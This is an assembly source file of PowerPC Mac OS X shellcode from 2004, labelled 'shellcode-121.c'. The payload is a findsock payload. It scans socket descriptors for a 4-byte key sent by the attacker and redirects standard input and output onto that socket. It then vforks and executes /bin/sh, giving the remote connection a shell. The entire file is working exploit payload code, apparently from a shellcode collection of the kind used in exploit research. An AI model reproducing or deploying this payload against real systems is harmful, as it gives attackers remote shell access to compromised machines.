shellcode-121.c

;;;
;;; PowerPC OSX remote findsock by recv() key shellcode
;;;
;;; Dino Dai Zovi < ddz@theta44.org >, 20040816
;;;

.globl _shellcode
.text

.set KEY, 0x5858580a
.set PTHREAD_EXIT, 0x90017021   ; OSX 10.3.X

_shellcode:
Lfindsock:
        addis   r27, 0, hi16(KEY)
        ori     r27, r27, lo16(KEY)
        addis   r31, 0, hi16(0xffff0000)
        srawi   r31, r31, 11
        mtctr   r31

        ;; Count down sockets backwards in hopes of getting our most recent
        ;; connection (if we have multiple).
L0:     mfctr   r3
        addi    r3, r3, -1      ; r3 = socket file descriptor

        addi    r4, r1, -4      ; r4 = stack buffer
        sub     r5, r1, r4      ; r5 = 4
        li      r6, 0x4140
        srawi   r6, r6, 7       ; r6 = MSG_PEEK | MSG_DONTWAIT
        addi    r7, r5, -4      ; r7 = 0
        addi    r8, r5, -4      ; r8 = 0
        li      r30, 0x3aff
        srawi   r0, r30, 9      ; load syscall number into r0
        cmplw   r29, r29

        .long   0x44ffff02      ; recvfrom(s, buf, 4, 0x82, 0, 0)
        bdnzt   eq, L0
        ;; On syscall error, attempt compare anyway and loop

        lwz     r28, -4(r1)
        cmplw   r28, r27
        bdnzf   eq, L0
        ;;; At this point our socket fd is in ctr

;;;
;;; dup2(2) our socket (in ctr) to stdin, stdout, stderr
;;;
Ldup_fds:
        li      r30, 0x2d01
        srawi   r0, r30, 7
        li      r30, 0x666
        srawi   r30, r30, 9

        mfctr   r3
        addi    r4, r30, -1
        .long   0x44ffff02      ; dup2(sock, 2)
        .long   0x7c842008

        mfctr   r3
        addi    r4, r30, -2
        .long   0x44ffff02      ; dup2(sock, 1)
        .long   0x7c842008

        mfctr   r3
        addi    r4, r30, -3
        .long   0x44ffff02      ; dup2(sock, 0)
        .long   0x7c842008

;;;
;;; VForking shellcode - Call vfork() and execute /bin/sh in child process.
;;; In parent, we exec "/bin/si" ("/bin/sh" + 1), fail, and run the code that
;;; follows the execve().
;;;
Lfork_execve_binsh:
        ;; call vfork (necessary to exec in threaded programs)
        li      r30, 0x42ff
        srawi   r0, r30, 8
        .long   0x44ffff02
        .long   0x7c842008

        xor     r31, r31, r31
        lis     r30, 0x2f2f
        addi    r30, r30, 0x7367
        add     r30, r30, r4    ; In child, $r4 should be zero
        lis     r29, 0x2f62
        addi    r29, r29, 0x696e
        xor     r28, r28, r28
        addi    r27, r1, -12
        stmw    r27, -12(r1)    ; -12 is arbitrary null-eliding constant

        addi    r4, r1, -12
        addi    r3, r1, -4
        xor     r5, r5, r5
        li      r30, 30209
        srawi   r0, r30, 9      ; r0 = 59
        .long   0x44ffff02      ; execve(path, argv, NULL)
Lparent:

;;;
;;; Call pthread_exit in parent process
;;;
Lpthexit:
        addis   r31, 0, hi16(PTHREAD_EXIT) ; pthread_exit
        ori     r31, r31, lo16(PTHREAD_EXIT)
        mtctr   r31
        bctrl